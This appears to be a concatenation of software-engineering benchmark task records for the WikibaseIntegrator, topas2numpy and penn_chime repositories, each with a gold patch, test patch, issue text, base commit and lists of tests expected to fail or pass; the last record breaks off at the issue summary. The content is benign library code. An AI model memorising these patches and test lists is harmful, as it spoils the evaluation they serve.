"metadata": {},
@@ -282,18 +282,34 @@
"new_qualifiers.add(datatypes.String(prop_nr='P828', value='Item qualifier'))\n",
"\n",
"new_references = References()\n",
+ "\n",
+ "# Create a first reference\n",
"new_reference1 = Reference()\n",
"new_reference1.add(datatypes.String(prop_nr='P828', value='Item string reference'))\n",
"\n",
+ "# Create another reference\n",
"new_reference2 = Reference()\n",
"new_reference2.add(datatypes.String(prop_nr='P828', value='Another item string reference'))\n",
"\n",
+ "# Create a reference with \"no value\"\n",
+ "new_reference3 = Reference()\n",
+ "new_reference3.add(datatypes.String(prop_nr='P828', snaktype=WikibaseSnakType.NO_VALUE))\n",
+ "\n",
+ "# Add all the references to the References object\n",
"new_references.add(new_reference1)\n",
"new_references.add(new_reference2)\n",
+ "new_references.add(new_reference3)\n",
+ "\n",
+ "# Create the claim with the qualifiers and refererences. Set rank as 'preferred'.\n",
+ "new_claim = datatypes.String(prop_nr='P31533', value='A String property', qualifiers=new_qualifiers,\n",
+ " references=new_references, rank=WikibaseRank.PREFERRED)\n",
+ "\n",
+ "new_item.claims.add(new_claim)\n",
"\n",
- "new_claim = datatypes.String(prop_nr='P31533', value='A String property', qualifiers=new_qualifiers, references=new_references)\n",
+ "# Create a claim with an unknown value\n",
+ "unknown_claim = datatypes.String(prop_nr='P3133', snaktype=WikibaseSnakType.UNKNOWN_VALUE)\n",
"\n",
- "new_item.claims.add(new_claim)"
+ "new_item.claims.add(unknown_claim)"
]
},
{
@@ -320,7 +336,7 @@
"outputs": [
{
"data": {
- "text/plain": "<ItemEntity @ed4640 _BaseEntity__api=<wikibaseintegrator.wikibaseintegrator.WikibaseIntegrator object at 0x000001D8C4ED42E0>\n\t _BaseEntity__title=None\n\t _BaseEntity__pageid=None\n\t _BaseEntity__lastrevid=579081\n\t _BaseEntity__type='item'\n\t _BaseEntity__id='Q225256'\n\t _BaseEntity__claims=<Claims @ed79a0 _Claims__claims={'P31533': [<String @ed7550 _Claim__mainsnak=<Snak @ed7160 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P31533' _Snak__hash='112d32b098a091cc1398c779e76c763a523d4ffc' _Snak__datavalue={'value': 'A String property', 'type': 'string'} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @ed6fb0 _Qualifiers__qualifiers={'P828': [<Snak @ed71c0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='8d721edd0365e35ed006822601a4837b35e68fd6' _Snak__datavalue={'value': 'Item qualifier', 'type': 'string'} _Snak__datatype='string'>]}> _Claim__qualifiers_order=['P828'] _Claim__id='Q225256$A1CB5069-5FF4-4EE4-BE99-D1607BFFB705' _Claim__rank=<WikibaseRank.NORMAL: 'normal'> _Claim__removed=False _Claim__references=<References @ed7010 _References__references=[<Reference @ed75b0 _Reference__hash='9820f3e32182f8b5575be8b9cf55b9c7e5fbf269' _Reference__snaks=<Snaks @ed6f20 snaks={'P828': [<Snak @ed7220 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='811577f0f42a7059f39bd6b169366bb1fb2f9af3' _Snak__datavalue={'value': 'Item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>, <Reference @ed76a0 _Reference__hash='0d2ff45b3eace5dd184ad5f4ac0d1c6eff35e4ac' _Reference__snaks=<Snaks @ed7490 snaks={'P828': [<Snak @ed7580 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='774c2b3d70f072fb26d05a95d24445fbc8b2534e' _Snak__datavalue={'value': 'Another item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>]>>]}>\n\t _ItemEntity__labels=<Labels @ed74f0 _LanguageValues__values={'en': <LanguageValue @ed7130 _LanguageValue__language='en' _LanguageValue__value='New item' _LanguageValue__removed=False>, 'fr': <LanguageValue @ed7190 _LanguageValue__language='fr' _LanguageValue__value='Nouvel élément' _LanguageValue__removed=False>}>\n\t _ItemEntity__descriptions=<Descriptions @ed4280 _LanguageValues__values={'en': <LanguageValue @ed54e0 _LanguageValue__language='en' _LanguageValue__value='A freshly created element' _LanguageValue__removed=False>, 'fr': <LanguageValue @ed7040 _LanguageValue__language='fr' _LanguageValue__value='Un élément fraichement créé' _LanguageValue__removed=False>}>\n\t _ItemEntity__aliases=<Aliases @ed4760 _Aliases__aliases={'en': [<Alias @ed6e60 _LanguageValue__language='en' _LanguageValue__value='Item' _LanguageValue__removed=False>], 'fr': [<Alias @ed76d0 _LanguageValue__language='fr' _LanguageValue__value='Élément' _LanguageValue__removed=False>]}>\n\t _ItemEntity__sitelinks=<Sitelinks @ed6350 sitelinks={}>>"
+ "text/plain": "<ItemEntity @c23520 _BaseEntity__api=<wikibaseintegrator.wikibaseintegrator.WikibaseIntegrator object at 0x0000024546C23400>\n\t _BaseEntity__title=None\n\t _BaseEntity__pageid=None\n\t _BaseEntity__lastrevid=598021\n\t _BaseEntity__type='item'\n\t _BaseEntity__id='Q226304'\n\t _BaseEntity__claims=<Claims @c5f0d0 _Claims__claims={'P31533': [<String @c5fee0 _Claim__mainsnak=<Snak @c5fe20 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P31533' _Snak__hash='112d32b098a091cc1398c779e76c763a523d4ffc' _Snak__datavalue={'value': 'A String property', 'type': 'string'} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @c5ef80 _Qualifiers__qualifiers={'P828': [<Snak @c5fca0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='8d721edd0365e35ed006822601a4837b35e68fd6' _Snak__datavalue={'value': 'Item qualifier', 'type': 'string'} _Snak__datatype='string'>]}> _Claim__qualifiers_order=['P828'] _Claim__id='Q226304$C318B066-FD5E-4766-BD03-5F881145511A' _Claim__rank=<WikibaseRank.PREFERRED: 'preferred'> _Claim__removed=False _Claim__references=<References @c5efb0 _References__references=[<Reference @c5d900 _Reference__hash='9820f3e32182f8b5575be8b9cf55b9c7e5fbf269' _Reference__snaks=<Snaks @c5fd30 snaks={'P828': [<Snak @c5d720 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='811577f0f42a7059f39bd6b169366bb1fb2f9af3' _Snak__datavalue={'value': 'Item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>, <Reference @c5f340 _Reference__hash='0d2ff45b3eace5dd184ad5f4ac0d1c6eff35e4ac' _Reference__snaks=<Snaks @c5f280 snaks={'P828': [<Snak @c5d3f0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='774c2b3d70f072fb26d05a95d24445fbc8b2534e' _Snak__datavalue={'value': 'Another item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>, <Reference @c5e290 _Reference__hash='4968e32f26488317c52a8883b49cb160b39e3428' _Reference__snaks=<Snaks @c5ffd0 snaks={'P828': [<Snak @c5c7c0 _Snak__snaktype=<WikibaseSnakType.NO_VALUE: 'novalue'> _Snak__property_number='P828' _Snak__hash='6e63dffef5a685b86c63dafda7a4748cbe8b029e' _Snak__datavalue={} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>]>>], 'P3133': [<MonolingualText @c5f520 _Claim__mainsnak=<Snak @c5d060 _Snak__snaktype=<WikibaseSnakType.UNKNOWN_VALUE: 'somevalue'> _Snak__property_number='P3133' _Snak__hash='4b66bd689df0c4cd59c2df014b4e6a97ee99240d' _Snak__datavalue={} _Snak__datatype='monolingualtext'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @c5ef50 _Qualifiers__qualifiers={}> _Claim__qualifiers_order=[] _Claim__id='Q226304$7B072F85-CDB5-4F8D-9F34-ABDE829581FC' _Claim__rank=<WikibaseRank.NORMAL: 'normal'> _Claim__removed=False _Claim__references=<References @c5feb0 _References__references=[]>>]}>\n\t _ItemEntity__labels=<Labels @c5ff10 _LanguageValues__values={'en': <LanguageValue @c5fdf0 _LanguageValue__language='en' _LanguageValue__value='New item' _LanguageValue__removed=False>, 'fr': <LanguageValue @c5c5b0 _LanguageValue__language='fr' _LanguageValue__value='Nouvel élément' _LanguageValue__removed=False>}>\n\t _ItemEntity__descriptions=<Descriptions @c234f0 _LanguageValues__values={'en': <LanguageValue @c5cfd0 _LanguageValue__language='en' _LanguageValue__value='A freshly created element' _LanguageValue__removed=False>, 
'fr': <LanguageValue @c5eda0 _LanguageValue__language='fr' _LanguageValue__value='Un élément fraichement créé' _LanguageValue__removed=False>}>\n\t _ItemEntity__aliases=<Aliases @c23550 _Aliases__aliases={'en': [<Alias @c5ef20 _LanguageValue__language='en' _LanguageValue__value='Item' _LanguageValue__removed=False>], 'fr': [<Alias @c5ed10 _LanguageValue__language='fr' _LanguageValue__value='Élément' _LanguageValue__removed=False>]}>\n\t _ItemEntity__sitelinks=<Sitelinks @c5d2a0 sitelinks={}>>"
},
"execution_count": 10,
"metadata": {},
diff --git a/wikibaseintegrator/models/claims.py b/wikibaseintegrator/models/claims.py
index 641ae1e..8a64564 100644
--- a/wikibaseintegrator/models/claims.py
+++ b/wikibaseintegrator/models/claims.py
@@ -8,7 +8,7 @@ from wikibaseintegrator.models.basemodel import BaseModel
from wikibaseintegrator.models.qualifiers import Qualifiers
from wikibaseintegrator.models.references import Reference, References
from wikibaseintegrator.models.snaks import Snak, Snaks
-from wikibaseintegrator.wbi_enums import ActionIfExists, WikibaseRank
+from wikibaseintegrator.wbi_enums import ActionIfExists, WikibaseRank, WikibaseSnakType
class Claims(BaseModel):
@@ -131,14 +131,15 @@ class Claims(BaseModel):
class Claim(BaseModel):
DTYPE = 'claim'
- def __init__(self, qualifiers: Optional[Qualifiers] = None, rank: Optional[WikibaseRank] = None, references: Optional[Union[References, List[Union[Claim, List[Claim]]]]] = None) -> None:
+ def __init__(self, qualifiers: Optional[Qualifiers] = None, rank: Optional[WikibaseRank] = None, references: Optional[Union[References, List[Union[Claim, List[Claim]]]]] = None, snaktype: WikibaseSnakType = WikibaseSnakType.KNOWN_VALUE) -> None:
"""
:param qualifiers:
:param rank:
:param references: A References object, a list of Claim object or a list of list of Claim object
+ :param snaktype:
"""
- self.mainsnak = Snak(datatype=self.DTYPE)
+ self.mainsnak = Snak(datatype=self.DTYPE, snaktype=snaktype)
self.type = 'statement'
self.qualifiers = qualifiers or Qualifiers()
self.qualifiers_order = []
diff --git a/wikibaseintegrator/models/snaks.py b/wikibaseintegrator/models/snaks.py
index 3d5f207..0388b7a 100644
--- a/wikibaseintegrator/models/snaks.py
+++ b/wikibaseintegrator/models/snaks.py
@@ -100,7 +100,7 @@ class Snak(BaseModel):
@datavalue.setter
def datavalue(self, value):
- if value is not None:
+ if value is not None and value != {}:
self.snaktype = WikibaseSnakType.KNOWN_VALUE
self.__datavalue = value
diff --git a/wikibaseintegrator/wbi_helpers.py b/wikibaseintegrator/wbi_helpers.py
index 107e274..2c539b9 100644
--- a/wikibaseintegrator/wbi_helpers.py
+++ b/wikibaseintegrator/wbi_helpers.py
@@ -472,6 +472,28 @@ def search_entities(search_string: str, language: Optional[str] = None, strict_l
return results
+def fulltext_search(search: str, max_results: int = 50, allow_anonymous: bool = True, **kwargs: Any) -> List[Dict[str, Any]]:
+ """
+ Perform a fulltext search on the mediawiki instance.
+ It's an exception to the "only wikibase related function" rule! WikibaseIntegrator is focused on wikibase-only functions to avoid spreading out and covering all functions of MediaWiki.
+
+ :param search: Search for page titles or content matching this value. You can use the search string to invoke special search features, depending on what the wiki's search backend implements.
+ :param max_results: How many total pages to return. The value must be between 1 and 500.
+ :param allow_anonymous: Allow anonymous interaction with the MediaWiki API. 'True' by default.
+ :param kwargs: Extra parameters for mediawiki_api_call_helper()
+ :return:
+ """
+ params = {
+ 'action': 'query',
+ 'list': 'search',
+ 'srsearch': search,
+ 'srlimit': max_results,
+ 'format': 'json'
+ }
+
+ return mediawiki_api_call_helper(data=params, allow_anonymous=allow_anonymous, **kwargs)['query']['search']
+
+
def generate_entity_instances(entities: Union[str, List[str]], allow_anonymous: bool = True, **kwargs: Any) -> List[Tuple[str, BaseEntity]]:
"""
A method which allows for retrieval of a list of Wikidata entities. The method generates a list of tuples where the first value in the tuple is the entity's ID, whereas the
|
LeMyst/WikibaseIntegrator
|
50dc26d6396c65162027cd6f82fe07e8437fca09
|
diff --git a/test/test_wbi_core.py b/test/test_wbi_core.py
index 4bb3941..74d4e9a 100644
--- a/test/test_wbi_core.py
+++ b/test/test_wbi_core.py
@@ -210,6 +210,9 @@ class TestWbiCore(unittest.TestCase):
with self.assertRaises(ValueError):
t4.mainsnak.snaktype = 'invalid_value'
+ t5 = String(prop_nr='P1', snaktype=WikibaseSnakType.NO_VALUE)
+ assert t5.mainsnak.get_json()['snaktype'] == WikibaseSnakType.NO_VALUE.value
+
def test_new_item_creation(self):
data = [
String(value='test1', prop_nr='P1'),
|
Feature request: Add helper method for snaktype
As a user, I want to be able to indicate directly, when instantiating a claim, that it has no-value or unknown-value.
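As a rough sketch of the requested behaviour, based on the test added by the patch (property number `P1` is only a placeholder):

```py
from wikibaseintegrator import datatypes
from wikibaseintegrator.wbi_enums import WikibaseSnakType

# A claim created directly with a "no value" main snak
claim = datatypes.String(prop_nr='P1', snaktype=WikibaseSnakType.NO_VALUE)
assert claim.mainsnak.get_json()['snaktype'] == WikibaseSnakType.NO_VALUE.value
```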
|
0.0
|
50dc26d6396c65162027cd6f82fe07e8437fca09
|
[
"test/test_wbi_core.py::TestWbiCore::test_snaktype"
] |
[
"test/test_wbi_core.py::TestWbiCore::test_basedatatype_action_if_exists",
"test/test_wbi_core.py::TestWbiCore::test_count_references",
"test/test_wbi_core.py::TestWbiCore::test_description",
"test/test_wbi_core.py::TestWbiCore::test_entity_generator",
"test/test_wbi_core.py::TestWbiCore::test_get",
"test/test_wbi_core.py::TestWbiCore::test_get_property_list",
"test/test_wbi_core.py::TestWbiCore::test_get_qualifier_properties",
"test/test_wbi_core.py::TestWbiCore::test_item_engine",
"test/test_wbi_core.py::TestWbiCore::test_label",
"test/test_wbi_core.py::TestWbiCore::test_new_extra_item_creation",
"test/test_wbi_core.py::TestWbiCore::test_new_item_creation",
"test/test_wbi_core.py::TestWbiCore::test_rank",
"test/test_wbi_core.py::TestWbiCore::test_wd_search"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-09-23 18:12:57+00:00
|
mit
| 320
|
|
davidchall__topas2numpy-13
|
diff --git a/topas2numpy/binned.py b/topas2numpy/binned.py
index dac1dfe..2b65a6d 100644
--- a/topas2numpy/binned.py
+++ b/topas2numpy/binned.py
@@ -47,15 +47,15 @@ class BinnedResult(object):
dimensions: list of BinnedDimension objects
data: dict of scored data
"""
- def __init__(self, filepath):
+ def __init__(self, filepath, dtype=float):
self.path = filepath
_, ext = os.path.splitext(self.path)
if ext == '.bin':
- self._read_binary()
+ self._read_binary(dtype)
elif ext == '.csv':
- self._read_ascii()
+ self._read_ascii(dtype)
- def _read_binary(self):
+ def _read_binary(self, dtype):
"""Reads data and metadata from binary format."""
# NOTE: binary files store binned data using Fortran-like ordering.
# Dimensions are iterated like z, y, x (so x changes fastest)
@@ -64,7 +64,7 @@ class BinnedResult(object):
with open(header_path) as f_header:
self._read_header(f_header.read())
- data = np.fromfile(self.path)
+ data = np.fromfile(self.path, dtype=dtype)
# separate data by statistic
data = data.reshape((len(self.statistics), -1), order='F')
@@ -76,7 +76,7 @@ class BinnedResult(object):
self.data = data
- def _read_ascii(self):
+ def _read_ascii(self, dtype):
"""Reads data and metadata from ASCII format."""
# NOTE: ascii files store binned data using C-like ordering.
# Dimensions are iterated like x, y, z (so z changes fastest)
@@ -88,7 +88,7 @@ class BinnedResult(object):
header_str += line
self._read_header(header_str)
- data = np.loadtxt(self.path, delimiter=',', unpack=True, ndmin=1)
+ data = np.loadtxt(self.path, dtype=dtype, delimiter=',', unpack=True, ndmin=1)
# separate data by statistic (neglecting bin columns when necessary)
n_dim = len(self.dimensions)
|
davidchall/topas2numpy
|
f20177d6930798e317033ab0e66117bb65ee08d6
|
diff --git a/tests/test_binned.py b/tests/test_binned.py
index 19e68b3..04e7a37 100644
--- a/tests/test_binned.py
+++ b/tests/test_binned.py
@@ -12,6 +12,9 @@ Tests for TOPAS binned reading.
import unittest
import os.path
+# third-party imports
+import numpy as np
+
# project imports
from topas2numpy import BinnedResult
@@ -55,6 +58,7 @@ class TestAscii1D(unittest.TestCase):
assert self.result.statistics[0] == 'Sum'
assert len(self.result.data) == 1
data = self.result.data['Sum']
+ assert data.dtype == np.float64
assert data.shape[0] == self.result.dimensions[0].n_bins
assert data.shape[1] == self.result.dimensions[1].n_bins
assert data.shape[2] == self.result.dimensions[2].n_bins
@@ -62,7 +66,7 @@ class TestAscii1D(unittest.TestCase):
class TestAscii2D(unittest.TestCase):
def setUp(self):
- self.result = BinnedResult(ascii_2d_path)
+ self.result = BinnedResult(ascii_2d_path, dtype=np.uint32)
def test_quantity(self):
assert self.result.quantity == 'SurfaceTrackCount'
@@ -88,6 +92,7 @@ class TestAscii2D(unittest.TestCase):
assert self.result.statistics[0] == 'Sum'
assert len(self.result.data) == 1
data = self.result.data['Sum']
+ assert data.dtype == np.uint32
assert data.shape[0] == self.result.dimensions[0].n_bins
assert data.shape[1] == self.result.dimensions[1].n_bins
assert data.shape[2] == self.result.dimensions[2].n_bins
|
Detect best NumPy dtype (use unsigned int for SurfaceTrackCount)
When the TOPAS scorer mode is set to 'SurfaceTrackCount', the result is an integer. It would be best if the NumPy dtype of the loaded data were set to an unsigned integer type in this case.
It seems this library loads such arrays as 'float64', which uses only 53 of the 64 bits to store the mantissa, meaning 11 of the 64 bits are wasted in the case of 'SurfaceTrackCount', which unnecessarily increases file size.
It's also unexpected to receive a NumPy array of type 'float64' when the data consists of unsigned integers, so this may have a usability impact as well.
Is it possible to change this library so that it bases the data type on whether the scorer is 'SurfaceTrackCount' or something else?
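A small usage sketch of the `dtype` argument the patch introduces (the file name is hypothetical):

```py
import numpy as np
from topas2numpy import BinnedResult

# Read a SurfaceTrackCount result as unsigned integers instead of float64
result = BinnedResult('surface_counts.csv', dtype=np.uint32)
assert result.data['Sum'].dtype == np.uint32
```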
|
0.0
|
f20177d6930798e317033ab0e66117bb65ee08d6
|
[
"tests/test_binned.py::TestAscii2D::test_data",
"tests/test_binned.py::TestAscii2D::test_dimensions",
"tests/test_binned.py::TestAscii2D::test_quantity"
] |
[
"tests/test_binned.py::TestAscii1D::test_data",
"tests/test_binned.py::TestAscii1D::test_dimensions",
"tests/test_binned.py::TestAscii1D::test_quantity",
"tests/test_binned.py::TestBinary1D::test_data",
"tests/test_binned.py::TestBinary1D::test_dimensions",
"tests/test_binned.py::TestBinary1D::test_quantity"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-06-22 05:16:22+00:00
|
mit
| 1,851
|
|
CodeForPhilly__chime-418
|
diff --git a/src/penn_chime/models.py b/src/penn_chime/models.py
index da7311f..6582b1c 100644
--- a/src/penn_chime/models.py
+++ b/src/penn_chime/models.py
@@ -9,7 +9,7 @@ from __future__ import annotations
from datetime import date, datetime, timedelta
from logging import INFO, basicConfig, getLogger
from sys import stdout
-from typing import Dict, Generator, Tuple, Sequence,Optional
+from typing import Dict, Generator, Tuple, Sequence, Optional
import numpy as np
import pandas as pd
@@ -66,14 +66,13 @@ class SimSirModel:
intrinsic_growth_rate = get_growth_rate(p.doubling_time)
self.beta = get_beta(intrinsic_growth_rate, gamma, self.susceptible, 0.0)
+ self.beta_t = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, p.relative_contact_rate)
self.i_day = 0 # seed to the full length
- self.beta_t = self.beta
- self.run_projection(p)
+ self.run_projection(p, [(self.beta, p.n_days)])
self.i_day = i_day = int(get_argmin_ds(self.census_df, p.current_hospitalized))
- self.beta_t = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, p.relative_contact_rate)
- self.run_projection(p)
+ self.run_projection(p, self.gen_policy(p))
logger.info('Set i_day = %s', i_day)
p.date_first_hospitalized = p.current_date - timedelta(days=i_day)
@@ -100,7 +99,7 @@ class SimSirModel:
self.beta = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, 0.0)
self.beta_t = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, p.relative_contact_rate)
- self.run_projection(p)
+ self.run_projection(p, self.gen_policy(p))
loss = self.get_loss()
losses[i] = loss
@@ -109,7 +108,7 @@ class SimSirModel:
intrinsic_growth_rate = get_growth_rate(p.doubling_time)
self.beta = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, 0.0)
self.beta_t = get_beta(intrinsic_growth_rate, self.gamma, self.susceptible, p.relative_contact_rate)
- self.run_projection(p)
+ self.run_projection(p, self.gen_policy(p))
self.population = p.population
else:
@@ -146,18 +145,35 @@ class SimSirModel:
self.daily_growth_rate = get_growth_rate(p.doubling_time)
self.daily_growth_rate_t = get_growth_rate(self.doubling_time_t)
- def run_projection(self, p):
+ def gen_policy(self, p: Parameters) -> Sequence[Tuple[float, int]]:
+ if p.mitigation_date is not None:
+ mitigation_day = -(p.current_date - p.mitigation_date).days
+ else:
+ mitigation_day = 0
+
+ total_days = self.i_day + p.n_days
+
+ if mitigation_day < -self.i_day:
+ mitigation_day = -self.i_day
+
+ pre_mitigation_days = self.i_day + mitigation_day
+ post_mitigation_days = total_days - pre_mitigation_days
+
+ return [
+ (self.beta, pre_mitigation_days),
+ (self.beta_t, post_mitigation_days),
+ ]
+
+ def run_projection(self, p: Parameters, policy: Sequence[Tuple[float, int]]):
self.raw_df = sim_sir_df(
self.susceptible,
self.infected,
p.recovered,
self.gamma,
-self.i_day,
- self.beta,
- self.i_day,
- self.beta_t,
- p.n_days
+ policy
)
+
self.dispositions_df = build_dispositions_df(self.raw_df, self.rates, p.market_share, p.current_date)
self.admits_df = build_admits_df(self.dispositions_df)
self.census_df = build_census_df(self.admits_df, self.days)
@@ -221,7 +237,7 @@ def sir(
def gen_sir(
- s: float, i: float, r: float, gamma: float, i_day: int, *args
+ s: float, i: float, r: float, gamma: float, i_day: int, policies: Sequence[Tuple[float, int]]
) -> Generator[Tuple[int, float, float, float], None, None]:
"""Simulate SIR model forward in time yielding tuples.
Parameter order has changed to allow multiple (beta, n_days)
@@ -230,8 +246,7 @@ def gen_sir(
s, i, r = (float(v) for v in (s, i, r))
n = s + i + r
d = i_day
- while args:
- beta, n_days, *args = args
+ for beta, n_days in policies:
for _ in range(n_days):
yield d, s, i, r
s, i, r = sir(s, i, r, beta, gamma, n)
@@ -241,11 +256,11 @@ def gen_sir(
def sim_sir_df(
s: float, i: float, r: float,
- gamma: float, i_day: int, *args
+ gamma: float, i_day: int, policies: Sequence[Tuple[float, int]]
) -> pd.DataFrame:
"""Simulate the SIR model forward in time."""
return pd.DataFrame(
- data=gen_sir(s, i, r, gamma, i_day, *args),
+ data=gen_sir(s, i, r, gamma, i_day, policies),
columns=("day", "susceptible", "infected", "recovered"),
)
diff --git a/src/penn_chime/parameters.py b/src/penn_chime/parameters.py
index d9da047..d6c03a0 100644
--- a/src/penn_chime/parameters.py
+++ b/src/penn_chime/parameters.py
@@ -55,6 +55,7 @@ class Parameters:
hospitalized: Disposition,
icu: Disposition,
relative_contact_rate: float,
+ mitigation_date: Optional[date] = None,
ventilated: Disposition,
current_date: date = date.today(),
date_first_hospitalized: Optional[date] = None,
@@ -68,7 +69,6 @@ class Parameters:
region: Optional[Regions] = None,
):
self.current_hospitalized = Positive(value=current_hospitalized)
- self.relative_contact_rate = Rate(value=relative_contact_rate)
Rate(value=hospitalized.rate), Rate(value=icu.rate), Rate(value=ventilated.rate)
StrictlyPositive(value=hospitalized.days), StrictlyPositive(value=icu.days),
@@ -92,6 +92,9 @@ class Parameters:
self.date_first_hospitalized = OptionalDate(value=date_first_hospitalized)
self.doubling_time = OptionalStrictlyPositive(value=doubling_time)
+ self.relative_contact_rate = Rate(value=relative_contact_rate)
+ self.mitigation_date = OptionalDate(value=mitigation_date)
+
self.infectious_days = StrictlyPositive(value=infectious_days)
self.market_share = Rate(value=market_share)
self.max_y_axis = OptionalStrictlyPositive(value=max_y_axis)
diff --git a/src/penn_chime/presentation.py b/src/penn_chime/presentation.py
index 6492e1b..0f50f42 100644
--- a/src/penn_chime/presentation.py
+++ b/src/penn_chime/presentation.py
@@ -11,6 +11,7 @@ from .constants import (
CHANGE_DATE,
DATE_FORMAT,
DOCS_URL,
+ EPSILON,
FLOAT_INPUT_MIN,
FLOAT_INPUT_STEP,
)
@@ -207,6 +208,10 @@ def display_sidebar(st, d: Parameters) -> Parameters:
st_obj, "Date of first hospitalized case - Enter this date to have chime estimate the initial doubling time",
value=d.date_first_hospitalized,
)
+ mitigation_date_input = DateInput(
+ st_obj, "Date of social distancing measures effect (may be delayed from implementation)",
+ value=d.mitigation_date
+ )
relative_contact_pct_input = PercentInput(
st_obj,
"Social distancing (% reduction in social contact going forward)",
@@ -312,7 +317,15 @@ def display_sidebar(st, d: Parameters) -> Parameters:
doubling_time = doubling_time_input()
date_first_hospitalized = None
- relative_contact_rate = relative_contact_pct_input()
+ if st.sidebar.checkbox(
+ "Social distancing measures have been implemented",
+ value=(d.relative_contact_rate > EPSILON)
+ ):
+ mitigation_date = mitigation_date_input()
+ relative_contact_rate = relative_contact_pct_input()
+ else:
+ mitigation_date = None
+ relative_contact_rate = EPSILON
st.sidebar.markdown(
"### Severity Parameters [ℹ]({docs_url}/what-is-chime/parameters#severity-parameters)".format(
@@ -346,6 +359,7 @@ def display_sidebar(st, d: Parameters) -> Parameters:
hospitalized=Disposition(hospitalized_rate, hospitalized_days),
icu=Disposition(icu_rate, icu_days),
relative_contact_rate=relative_contact_rate,
+ mitigation_date=mitigation_date,
ventilated=Disposition(ventilated_rate, ventilated_days),
current_date=current_date,
date_first_hospitalized=date_first_hospitalized,
diff --git a/src/penn_chime/settings.py b/src/penn_chime/settings.py
index 0bd1298..a9ccb34 100644
--- a/src/penn_chime/settings.py
+++ b/src/penn_chime/settings.py
@@ -16,6 +16,7 @@ def get_defaults():
infectious_days=14,
market_share=0.15,
n_days=100,
+ mitigation_date=date.today(),
relative_contact_rate=0.3,
ventilated=Disposition(0.005, 10),
)
|
CodeForPhilly/chime
|
e6ff8aaa0be2be7c27ec9b98611147650d414270
|
diff --git a/tests/conftest.py b/tests/conftest.py
index e822d91..b7cf01f 100644
--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -51,6 +51,7 @@ def DEFAULTS():
doubling_time=4.0,
n_days=60,
market_share=0.15,
+ mitigation_date=datetime(year=2020, month=3, day=28),
relative_contact_rate=0.3,
hospitalized=Disposition(0.025, 7),
icu=Disposition(0.0075, 9),
@@ -65,6 +66,7 @@ def param():
current_hospitalized=100,
doubling_time=6.0,
market_share=0.05,
+ mitigation_date=datetime(year=2020, month=3, day=28),
relative_contact_rate=0.15,
population=500000,
hospitalized=Disposition(0.05, 7),
@@ -81,6 +83,7 @@ def halving_param():
current_hospitalized=100,
doubling_time=6.0,
market_share=0.05,
+ mitigation_date=datetime(year=2020, month=3, day=28),
relative_contact_rate=0.7,
population=500000,
hospitalized=Disposition(0.05, 7),
diff --git a/tests/penn_chime/test_models.py b/tests/penn_chime/test_models.py
index a8c4129..d5e6de2 100644
--- a/tests/penn_chime/test_models.py
+++ b/tests/penn_chime/test_models.py
@@ -3,11 +3,13 @@ from datetime import date
import pytest
import pandas as pd
import numpy as np
+from datetime import timedelta
from src.penn_chime.models import (
sir,
sim_sir_df,
get_growth_rate,
+ SimSirModel,
)
from src.penn_chime.constants import EPSILON
@@ -64,7 +66,7 @@ def test_sim_sir():
Rounding to move fast past decimal place issues
"""
raw_df = sim_sir_df(
- 5, 6, 7, 0.1, 0, 0.1, 40, # s # i # r # gamma # i_day # beta1 # n_days1
+ 5, 6, 7, 0.1, 0, [(0.1, 40)], # s # i # r # gamma # i_day # beta1 # n_days1
)
first = raw_df.iloc[0, :]
@@ -100,6 +102,20 @@ def test_model(model, param):
assert model.r_t == 2.307298374881539
assert model.r_naught == 2.7144686763312222
assert model.doubling_time_t == 7.764405988534983
+ assert model.i_day == 43
+
+
+def test_model_first_hosp_fit(param):
+ param.date_first_hospitalized = param.current_date - timedelta(days=43)
+ param.doubling_time = None
+
+ my_model = SimSirModel(param)
+
+ assert my_model.intrinsic_growth_rate == 0.12246204830937302
+ assert abs(my_model.beta - 4.21501347256401e-07) < EPSILON
+ assert my_model.r_t == 2.307298374881539
+ assert my_model.r_naught == 2.7144686763312222
+ assert my_model.doubling_time_t == 7.764405988534983
def test_model_raw_start(model, param):
|
["model"] social isolation started earlier than model assumes
<!--
Please note: Any changes to the model have a huge impact on rapidly evolving hospital system & public health decisions. The current model has been in use for a while now, and it has been validated against other similar models, so any changes to the model must meet a very high bar.
However, these 2 types of issue reports are very welcome:
- Bugs causing this model to produce invalid results. In this case, please include details and a suggested fix.
- If this model is producing a significantly different result than another well-known epidemiological model. In this case, please include proof of this difference and a suggested fix to our approach.
For questions or early discussion, please join us in [#chime-analysis](https://codeforphilly.org/chat?channel=chime-analysis) in Slack instead.
-->
### Summary
